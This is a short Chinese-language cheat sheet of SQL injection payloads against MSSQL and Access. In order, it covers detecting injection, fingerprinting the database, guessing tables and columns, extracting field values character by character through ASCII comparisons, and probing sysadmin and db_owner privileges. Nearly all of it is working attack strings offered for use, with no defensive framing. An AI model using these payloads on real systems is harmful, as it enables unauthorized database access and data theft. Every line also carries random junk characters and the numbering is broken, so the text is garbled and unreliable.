1.判断是否有注入;and 1=1 ;and 1=2 k$nQY
2.初步判断是否是mssql ;and user>0 q^],K'
yZ t}Jnv
3.注入参数是字符'and [查询条件] and ''=' "|{O%X
pqPhtWi%PJ
4.搜索时没过滤参数的'and [查询条件] and '%25'=' xXl^\?HC
CybHr#LBc
5.判断数据库系统 K9co_n_L
gTRm
;and (select count(*) from sysobjects)>0 mssql B JDe1W3;'
9.R)iA
;and (select count(*) from msysobjects)>0 access @; ayl
w=Xil
nA%H`/O{
WAlsh
6.猜数据库 ;and (select Count(*) from [数据库名])>0 pyZ&[*@
$a(EF
6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 +Ok R7bl
'`^<*;w
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 BBy"qkTe
1bb~u/jU
9.(1)猜字段的ascii值(access) H"W%+{AR
$FEG0&
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 U@v=q9'W
y?W8FL
(2)猜字段的ascii值(mssql) '|n-w\
>Wv
Hw8`/'M=%5
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 cF_hU"
b'`8$;MII
10.测试权限结构(mssql) Gu Msw*{>
k WYjqv
2`,{IHu*!
0IoS|P}6a
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- IH?.s
k
F,^Q'$!
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- \k;)m-0bj{
ou6|;*>d
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- IbAGnl {
$-9m8}U(Y
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- )`]w\s
#
s
bV6}
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- I3o6ym-i
S/pTFlptCa
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ;3NA,JA#Y
)|f!}( p
;and 1=(select IS_MEMBER('db_owner'));-- 1lu_<?O
@~Z:W<X
%\ -u&